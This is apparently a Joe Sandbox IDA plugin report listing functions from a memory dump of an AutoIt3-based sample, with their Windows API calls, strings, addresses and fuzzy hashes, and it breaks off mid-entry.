Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 812db204bd4f47b0201dfd5252c943ff5ffad0cce83d92174ee9c6ae19bf5c42
Instruction ID: e732c29c7521c06b2b2844b50573933f9d1f99955466b330349236257ea431d4
Opcode Fuzzy Hash: 812db204bd4f47b0201dfd5252c943ff5ffad0cce83d92174ee9c6ae19bf5c42
Instruction Fuzzy Hash: 322125312042107AEB255B35AC09EBF7B9ADF49711F10522DFC04CA261EF618D819760

Function 0068B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

GetWindowLongW.USER32(?,000000F0), ref: 0068B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0068B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0068B1CF
GetSystemMetrics.USER32(00000004), ref: 0068B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00670E90,00000000), ref: 0068B216

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 282f446efda4a24cae16cb48a37d312998a5b5e75fc9a508f49b99cc29e51dac
Instruction ID: 659df73b2e7a216883f840a24b909cd5ab8ec2028453d449f5a0cb6ff299abcd
Opcode Fuzzy Hash: 282f446efda4a24cae16cb48a37d312998a5b5e75fc9a508f49b99cc29e51dac
Instruction Fuzzy Hash: 4F219171910261AFCB10AF38DC28ABA3BA6FB15321F145738F972D72E0E73099518B90

Function 00659307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00659320

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659352
__itow.LIBCMT ref: 0065936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659392
__itow.LIBCMT ref: 006593A3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 57a56312c2daf7086a66267250289cad67979a7b322ee189aceeedc2b1cd39cf
Instruction ID: 5ec48e607e0ace47413368f3b7c0c51a792544fd56f6a0c9a743703aef1b5207
Opcode Fuzzy Hash: 57a56312c2daf7086a66267250289cad67979a7b322ee189aceeedc2b1cd39cf
Instruction Fuzzy Hash: 1A21F531B40218FBDB10AB608C8AEEE7BABEB49711F044029FD04D72C0D6B09D4987A1

Function 00675A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00675A6E
GetForegroundWindow.USER32 ref: 00675A85
GetDC.USER32(00000000), ref: 00675AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00675ACD
ReleaseDC.USER32(00000000,00000003), ref: 00675B08

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 3d1562b2a13e3a7b9ac0abdd79b820e26dfabb5668e7ef619a83a5e34852de47
Instruction ID: 70fabb408ce8102f6078404789cdb2d6c5ed07c96124c2c73ef446187020d2b3
Opcode Fuzzy Hash: 3d1562b2a13e3a7b9ac0abdd79b820e26dfabb5668e7ef619a83a5e34852de47
Instruction Fuzzy Hash: C8219235A00104AFDB14EF64D884A9ABBE6EF48310F14C579F84A97352DA70AC40CB50

Function 006012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0060134D
SelectObject.GDI32(?,00000000), ref: 0060135C
BeginPath.GDI32(?), ref: 00601373
SelectObject.GDI32(?,00000000), ref: 0060139C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5d98fb03ea2221e48937f7f049a286d784bd1d71ed6f70e63a16c295ee6a3278
Instruction ID: c49e8c5d65780427ce47e95bc547869ec4159e1b488db828dc20de727a19b501
Opcode Fuzzy Hash: 5d98fb03ea2221e48937f7f049a286d784bd1d71ed6f70e63a16c295ee6a3278
Instruction Fuzzy Hash: 6C216D30941718EFDB189F25DC08BAA7BABFB01361F545226F812DA2F0D771A991DF90

Function 00664A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00664ABA
__beginthreadex.LIBCMT ref: 00664AD8
MessageBoxW.USER32(?,?,?,?), ref: 00664AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00664B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00664B0A

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: d9dfdf171a575a021297cb8355657d11ebba6aa9a911676322ac13234abef7e3
Instruction ID: 226ddb48e35a00bdc51e11560ad21a40c6943e9f584731230c31f16d81012532
Opcode Fuzzy Hash: d9dfdf171a575a021297cb8355657d11ebba6aa9a911676322ac13234abef7e3
Instruction Fuzzy Hash: 8F110476908618BBC7009FA8EC08EEB7FAEEB45320F144369F815D3350DA75DA448BA0

Function 00658202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0065821E
GetLastError.KERNEL32(?,00657CE2,?,?,?), ref: 00658228
GetProcessHeap.KERNEL32(00000008,?,?,00657CE2,?,?,?), ref: 00658237
HeapAlloc.KERNEL32(00000000,?,00657CE2,?,?,?), ref: 0065823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00658255

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d68d19f4bfa9aa50112cf4eedd479597333f312d7555a899c770b96235150f2f
Instruction ID: 6ab99cd7dc165716b9c9cfda69030780656affc2529568d9f5f2cad38211e16c
Opcode Fuzzy Hash: d68d19f4bfa9aa50112cf4eedd479597333f312d7555a899c770b96235150f2f
Instruction Fuzzy Hash: F8014B71200204BFDB204FA6DC48DAB7FAEEF8A755B500629F849D3220DA318D14CBA0

Function 0065710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?,?,00657455), ref: 00657127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 00657142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 00657150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?), ref: 00657160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 0065716C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: dc19399dc50ef8463b6d4114548d5b4019e6a727a47f9c48d1bc36fc09931df5
Instruction ID: b661aee8b9f3718130fb51207e935b04dd4eab4140b631fb306c367e6bc81662
Opcode Fuzzy Hash: dc19399dc50ef8463b6d4114548d5b4019e6a727a47f9c48d1bc36fc09931df5
Instruction Fuzzy Hash: C6018FB2601614BBDB214F65EC44BAA7BBEEF44792F180164FD04D2220DB31DD459BA0

Function 00665244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0066526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00665280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006652BC

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: aaf723812b7929e93b4c66547c67fff4a0d14ba493859db2b2fc41150ba837e0
Instruction ID: 129b60f28b5d18b7acba2d79dc24ad51bb256c57868d70ee84d831687361f8c1
Opcode Fuzzy Hash: aaf723812b7929e93b4c66547c67fff4a0d14ba493859db2b2fc41150ba837e0
Instruction Fuzzy Hash: 35011B31D01A19EBCF00EFE4DC5A5EDBB7AFB09711F401555E942F2244CB30965087A5

Function 0065810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0065812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658157

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ff798b430a4cfcb2915dd0585f88df1946046adf60412ba05e43e49a30420d35
Instruction ID: 6e8a0d387840b29c29ee56e589e78997709f00e8bcb3c237739908e3c2575fa4
Opcode Fuzzy Hash: ff798b430a4cfcb2915dd0585f88df1946046adf60412ba05e43e49a30420d35
Instruction Fuzzy Hash: 45F0AF70200305BFEB210FA5EC88EA73BAEEF49755F100125F985D3650DA619845DB60

Function 0065C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0065C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0065C20E
MessageBeep.USER32(00000000), ref: 0065C226
KillTimer.USER32(?,0000040A), ref: 0065C242
EndDialog.USER32(?,00000001), ref: 0065C25C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 4957bf8888d55498436b6a76c49d53574cd9b7c0fdc190f1792ee3a090545977
Instruction ID: ac3f4c60593ae4591929f69553ec459bdb20e190b63c3b7318dba2356ae9f244
Opcode Fuzzy Hash: 4957bf8888d55498436b6a76c49d53574cd9b7c0fdc190f1792ee3a090545977
Instruction Fuzzy Hash: 3B01A230404704ABEB205B60ED4EB9677BABB00B06F000769B982A14E0DBE46A888B90

Function 006013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 006013BF
StrokeAndFillPath.GDI32(?,?,0063B888,00000000,?), ref: 006013DB
SelectObject.GDI32(?,00000000), ref: 006013EE
DeleteObject.GDI32 ref: 00601401
StrokePath.GDI32(?), ref: 0060141C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: a2221ba26681ec85e17d666a0c39d3e2dc7dea75b6ae8c9dd24bd5ce3a87bc0c
Instruction ID: 62a48b0267f3f18ff5d671004c410521a3dc245d88275c7d349f5b7ac79088c8
Opcode Fuzzy Hash: a2221ba26681ec85e17d666a0c39d3e2dc7dea75b6ae8c9dd24bd5ce3a87bc0c
Instruction Fuzzy Hash: 87F01930011B08EFDB195F26EC4CBA93BE7A701326F18A324E42A881F1CB3059A5DF10

Function 0066C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0066C432
CoCreateInstance.OLE32(00692D6C,00000000,00000001,00692BDC,?), ref: 0066C44A

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

CoUninitialize.OLE32 ref: 0066C6B7

Strings

.lnk, xrefs: 0066C3C6, 0066C3EE, 0066C3F8

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: b44efa59a404d7daa5a99f4c8dab99b191ab85dbed401f2eb721a0c89fd1067d
Instruction ID: 36bd06fd15ed57b17d3a1938e8f3abf9ed0605cedfec16c986917e2818e86fd1
Opcode Fuzzy Hash: b44efa59a404d7daa5a99f4c8dab99b191ab85dbed401f2eb721a0c89fd1067d
Instruction Fuzzy Hash: D6A14AB1144205AFD744EF54C881EABB7EEEF84314F00491DF196872A2EB71EA09CB66

Function 00612CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00620DB6: std::exception::exception.LIBCMT ref: 00620DEC
Part of subcall function 00620DB6: __CxxThrowException@8.LIBCMT ref: 00620E01

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 00607A51: _memmove.LIBCMT ref: 00607AAB

__swprintf.LIBCMT ref: 00612ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00612D66

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 1167eb37918027946bda1eed00feadcaf87dbd973ded82055a25948cb535e465
Instruction ID: 42e0698d619df552c6580d8e454b24924f72587c55636e023e89f0b2abe9a7b0
Opcode Fuzzy Hash: 1167eb37918027946bda1eed00feadcaf87dbd973ded82055a25948cb535e465
Instruction Fuzzy Hash: 8291B0715083069FC758EF24D895CAFB7AAEF85710F04481DF4829B2A2DB30ED95CB56

Function 0066B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770

CoInitialize.OLE32(00000000), ref: 0066B9BB
CoCreateInstance.OLE32(00692D6C,00000000,00000001,00692BDC,?), ref: 0066B9D4
CoUninitialize.OLE32 ref: 0066B9F1

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

Strings

.lnk, xrefs: 0066B99D, 0066B9AB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: c97299da52ef520fdd700a1ae1985f6114aac6522987b9bbe05a76031e591140
Instruction ID: da36892e21197c175110265fa734aa64943256885c820e88c0f64ebf181d2648
Opcode Fuzzy Hash: c97299da52ef520fdd700a1ae1985f6114aac6522987b9bbe05a76031e591140
Instruction Fuzzy Hash: 80A11475604205DFCB14DF24C484D6ABBE6FF89314F148998F8999B3A2CB31ED85CB91

Function 0065B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0065B4BE

Strings

AutoIt3GUI, xrefs: 0065B436
Container, xrefs: 0065B43B
%i, xrefs: 0065B561

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%i
API String ID: 3565006973-3322876330
Opcode ID: b9f088001b0c35a562e1d2f20fef9a3152a4df85f40b5b8be2ca63c3be93b8f6
Instruction ID: f826b951e0e6ae26517430b985dd049bdf80a799e4d5cca3aaaa4248fef0be74
Opcode Fuzzy Hash: b9f088001b0c35a562e1d2f20fef9a3152a4df85f40b5b8be2ca63c3be93b8f6
Instruction Fuzzy Hash: D2915A70200601AFDB54CF64C884AAABBEAFF48711F20956DED4ACB391EB70E845CB50

Function 0062501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006250AD

Part of subcall function 006300F0: __87except.LIBCMT ref: 0063012B

Strings

pow, xrefs: 00625085, 006250A2

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: b7e97d404786f02da4ae89989049a1ffbd5e2594051f851bd97d61121df551a5
Instruction ID: 3fa18f2ea559bf9e4c8b0ccf9cd9a943e561f0f850fded9b51a9515b95b33a58
Opcode Fuzzy Hash: b7e97d404786f02da4ae89989049a1ffbd5e2594051f851bd97d61121df551a5
Instruction Fuzzy Hash: 35515A71918D0296EB317B14DD253BE2B979B40700F208959E4D6863A9EE348DDCDFCA

Function 00648584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0064862B
_memmove.LIBCMT ref: 00648685

Strings

_a, xrefs: 006486FF, 0064DFDC, 0064DFF8
3ca, xrefs: 0064860C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
